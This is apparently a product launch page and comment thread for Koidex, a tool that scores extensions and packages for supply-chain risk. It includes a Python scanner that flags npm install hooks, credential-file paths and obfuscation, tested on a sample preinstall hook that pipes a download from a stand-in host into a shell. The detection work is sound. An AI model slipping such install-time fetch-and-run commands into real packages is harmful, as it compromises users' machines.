
Koidex
Know if a package, extension, or AI model is actually safe
644 followers
Koidex helps you answer one question fast: "Is this safe to install?". Search extensions, code packages, and AI models across VS Code, JetBrains, npm, and Hugging Face. You can also install the Koidex IDE extension for real-time background scanning in Cursor and Windsurf. Free, no setup.
elasticode
Love the “Catch of the Day” concept. How often is it refreshed, and what qualifies something to show up there?
Koidex
@nogahsenecky Thanks! 🙌
Catch of the Day refreshes daily (and we’ll occasionally push mid-day updates when something high-confidence pops). An item shows up there when it trips our highest-risk signals, for example: suspicious permission combos, obfuscation / unusual code patterns, suspicious network behavior, or strong publisher / ecosystem indicators (like lookalikes or sudden changes).
Winn
The scoring feels opinionated in a good way. How do you balance “this needs broad permissions to work” vs “this is overreaching”?
Koidex
@orenhacohen We try not to punish “power tools” just because they need broad permissions. The score is a mix of capability plus context: what permissions it asks for, whether that matches the stated functionality, and whether we see other risk signals alongside it (suspicious behavior patterns, obfuscation, unusual update/install patterns, shady publisher signals, etc.).
So broad permissions alone usually won’t tank the rating. Broad permissions + mismatched behavior/context is where it starts to look like overreach.
Software Product Management Stack
Super useful! Does it also work for MCPs?
Koidex
@n1c0 Yes! MCP support is coming next week; we’re opening early access for it.
I’ll DM you the details and get you set up :)
This is the first time I can quickly sanity check an extension without falling into a rabbit hole. Nice job. Do you update scores automatically when an extension releases a new version?
Koidex
Thanks @amit_ganzi, glad you found it useful :)
Yes, we update scores as new versions are published. Quick question: would you rather get notified only on score changes, or also on specific signals (new permissions, new network behavior, etc.)?
I installed the IDE flow in Cursor and it instantly showed a couple extensions I forgot I even had. That alone is worth it. Does it alert when an extension updates and changes behavior?
Koidex
Amazing, thanks @netta_zohar2!
We re-evaluate extensions as new versions roll out, so ratings update over time. Alerts on updates/behavior changes are next on our list. What kind of alert would be most useful for you: score change, permission change, or behavior change?
Great launch!!!!!!! This is one of those “why doesn’t this already exist” products. Curious how you detect suspicious behavior without running the code on my machine?
Koidex
Thanks @shoval_a!! 🙌 Love hearing that.
We don’t need to run anything on your machine. We analyze the listing and its code server-side and look for a mix of signals, for example: permissions/capabilities, suspicious code patterns (obfuscation, risky APIs, install/update hooks), dependency and publisher signals, and known bad indicators.
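Koidex has not published its checks, so the following is an added illustration and not Koidex's code: a small server-side-style static scan of the kind the reply describes, looking at an npm package.json for install/update hooks, risky shell patterns inside them, and a crude obfuscation heuristic over a script body. The pattern list, thresholds, severity labels, and the two sample manifests are constructed assumptions for the example; the benign sample shows why a hook on its own only earns a "review" rather than a "high".

```python
"""Static checks for npm package manifests: install hooks and risky patterns.

Added illustration, not Koidex's code. Pattern list, thresholds and the sample
inputs below are constructed for the example.
"""
import json
import re

# Lifecycle scripts npm runs automatically during install, i.e. code that
# executes before the consumer has looked at anything.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristics over the hook's command text: (label, pattern).
RISKY_PATTERNS = [
    ("remote-pipe-to-shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|node)\b")),
    ("inline-eval", re.compile(r"\beval\s*\(")),
    # the word base64, or a 40+ char run of base64 alphabet (an inline blob)
    ("base64-payload", re.compile(r"\bbase64\b|[A-Za-z0-9+/]{40,}={0,2}")),
    ("credential-path", re.compile(r"(~|\$HOME)/\.(ssh|npmrc|aws|gitconfig)\b")),
]

HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")
OBF_IDENT = re.compile(r"\b_0x[0-9a-fA-F]{4,}\b")


def scan_manifest(manifest: dict) -> list[dict]:
    """Return findings for a parsed package.json.

    Every install-time hook is reported as 'review' (it runs code on install);
    each risky pattern found inside a hook adds a 'high' finding.
    """
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        findings.append({"hook": hook, "signal": "install-hook-present", "severity": "review"})
        for label, pattern in RISKY_PATTERNS:
            if pattern.search(cmd):
                findings.append({"hook": hook, "signal": label, "severity": "high"})
    return findings


def looks_obfuscated(source: str) -> bool:
    """Crude obfuscation heuristic: dense hex/unicode escapes, _0x-style
    identifiers, or a single very long line. Thresholds are constructed."""
    if not source.strip():
        return False
    longest = max(len(line) for line in source.splitlines())
    escapes = len(HEX_ESCAPE.findall(source))
    idents = len(OBF_IDENT.findall(source))
    escape_density = escapes / max(len(source), 1)
    return escape_density > 0.02 or idents >= 3 or longest > 2000


def risk_level(findings: list[dict], obfuscated: bool) -> str:
    """Collapse findings into one label: 'high', 'review' or 'clean'."""
    if obfuscated or any(f["severity"] == "high" for f in findings):
        return "high"
    if findings:
        return "review"
    return "clean"


# Constructed sample inputs (not real packages; the URL host is a reserved
# invalid domain).
BENIGN = {
    "name": "example-benign",
    "scripts": {"build": "tsc -p .", "postinstall": "node scripts/patch-paths.js"},
}
SUSPICIOUS = {
    "name": "example-suspicious",
    "scripts": {"preinstall": "curl -s https://example.invalid/setup.sh | sh"},
}
PLAIN_JS = "const x = 1;\nmodule.exports = () => x + 1;\n"
OBF_JS = "var _0x4a2b=['\\x68\\x6f\\x73\\x74'];var _0x1c3d=_0x4a2b[0];var _0x9e0f=_0x1c3d;\n"

if __name__ == "__main__":
    for manifest in (BENIGN, SUSPICIOUS):
        found = scan_manifest(manifest)
        print(manifest["name"], risk_level(found, False), json.dumps(found))
    print("plain:", looks_obfuscated(PLAIN_JS), "obfuscated:", looks_obfuscated(OBF_JS))
```

Running the block prints "review" for the benign package (a postinstall hook exists, but it only runs a local build script) and "high" for the suspicious one (its preinstall pipes a download into a shell), which is the capability-plus-context split the earlier replies describe. A real scanner would also walk the unpacked tarball rather than only the manifest, and would weight the signals instead of taking the maximum.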
Koidex
Hey, @soluneai. Thanks for checking it out. Koidex today is focused on the supply chain side: evaluating the tool you’re about to bring in (extensions right now, and MCP/agent tooling next), based on signals like capabilities/permissions, suspicious code patterns, publisher signals, and other risk indicators.
We’re not monitoring a model’s “off-spec” behavior across long sessions yet. That’s more runtime governance, and it’s a different problem space. But it’s definitely adjacent to where this all goes.
Curious, when you say “off-spec”, do you mean prompt/intent drift, unexpected external calls, or tool use that exceeds the allowed scope?